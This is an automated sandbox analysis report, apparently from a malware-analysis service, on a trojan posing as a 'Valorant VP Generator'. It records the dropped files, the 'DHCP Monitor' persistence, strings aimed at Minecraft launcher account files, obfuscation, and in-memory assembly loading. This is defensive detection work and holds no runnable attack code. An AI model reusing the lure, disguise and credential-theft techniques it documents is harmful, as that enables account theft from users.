Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287481820.0000000001140000.00000004.00020000.sdmp Binary or memory string: OriginalFilenamevampire.dll4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe Binary or memory string: OriginalFilenameoutput.exe4 vs 4Y85lSOUJ0.exe
Source: 4Y85lSOUJ0.exe Binary or memory string: OriginalFilenameValorant VP Generator.exe, vs 4Y85lSOUJ0.exe
PE file contains strange resources
Source: 4Y85lSOUJ0.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4Y85lSOUJ0.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: nano.exe.0.dr Static PE information: Section: .rsrc ZLIB complexity 0.996271306818
Source: dhcpmon.exe.2.dr Static PE information: Section: .rsrc ZLIB complexity 0.996271306818
Source: 4Y85lSOUJ0.exe Virustotal: Detection: 73%
Source: 4Y85lSOUJ0.exe ReversingLabs: Detection: 82%
Source: 4Y85lSOUJ0.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\4Y85lSOUJ0.exe "C:\Users\user\Desktop\4Y85lSOUJ0.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"
Source: C:\ProgramData\output.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\ProgramData\nano.exe Code function: 2_2_054D1692 AdjustTokenPrivileges, 2_2_054D1692
Source: C:\ProgramData\nano.exe Code function: 2_2_054D165B AdjustTokenPrivileges, 2_2_054D165B
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\4Y85lSOUJ0.exe.log
Source: C:\ProgramData\output.exe File created: C:\Users\user\AppData\Local\Temp\login.db
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/9@3/3
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File read: C:\Users\user\Desktop\desktop.ini
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\ProgramData\nano.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\ProgramData\nano.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\ProgramData\nano.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\ProgramData\output.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_01
Source: C:\ProgramData\nano.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\ProgramData\nano.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{e5633be0-23ed-438f-a28c-ab363fff6ac9}
Source: C:\ProgramData\nano.exe File created: C:\Program Files (x86)\DHCP Monitor
Source: 4Y85lSOUJ0.exe String found in binary or memory: copy to : /\launcher_profiles.json5Minecraft Session Profiles-launcher_profiles.json'multipart/form-data
Source: 4Y85lSOUJ0.exe String found in binary or memory: #Minecraft SessionKUnable to find launcher_profiles.jsonE\.minecraft\launcher_accounts.json/\launcher_accounts.json-launcher_accounts.jsonKUnable to find launcher_accounts.json
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: dhcpmon.exe.2.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\ProgramData\output.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\ProgramData\nano.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: 4Y85lSOUJ0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4Y85lSOUJ0.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: nano.exe, 00000002.00000002.552327927.0000000002DF5000.00000004.00000040.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: 4Y85lSOUJ0.exe, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dhcpmon.exe.2.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2D5C push ecx; retf 2_2_011D2D6E
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2D5C push ecx; retf 2_2_011D2D86
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2D5C push edi; retf 2_2_011D2DFE
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2E59 push edi; retf 2_2_011D2DF2
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2545 pushfd ; iretd 2_2_011D254E
Source: C:\ProgramData\nano.exe Code function: 2_2_011D3145 push eax; retf 2_2_011D314A
Source: C:\ProgramData\nano.exe Code function: 2_2_011D3379 pushfd ; iretd 2_2_011D338A
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2875 push edi; retf 2_2_011D2882
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2D80 push ecx; retf 2_2_011D2D86
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2EB8 pushfd ; iretd 2_2_011D2ED6
Source: C:\ProgramData\nano.exe Code function: 2_2_011D27D8 push eax; retf 2_2_011D27DA
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2FD0 push eax; retf 2_2_011D2FD6
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2FC9 push esp; iretd 2_2_011D2FCA
Source: C:\ProgramData\nano.exe Code function: 2_2_011D29C8 pushfd ; iretd 2_2_011D29C6
Source: C:\ProgramData\nano.exe Code function: 2_2_011D29C2 pushfd ; iretd 2_2_011D29C6
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2DEC push ecx; retf 2_2_011D2D86
Source: C:\ProgramData\nano.exe Code function: 2_2_011D2DEC push edi; retf 2_2_011D2DF2
Source: C:\ProgramData\nano.exe Code function: 2_2_011D32E8 push esi; iretd 2_2_011D32FA
Source: C:\ProgramData\nano.exe Code function: 2_2_011D28E1 push edi; retf 2_2_011D28E2
Source: C:\ProgramData\nano.exe Code function: 2_2_011E9D78 pushad ; retf 2_2_011E9D79
Source: C:\ProgramData\nano.exe Code function: 2_2_011E9D74 push eax; retf 2_2_011E9D75
Source: initial sample Static PE information: section name: .text entropy: 7.20683355294
Source: dhcpmon.exe.2.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: dhcpmon.exe.2.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.2.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.2.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.3.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 2.0.nano.exe.a80000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 2.0.nano.exe.a80000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
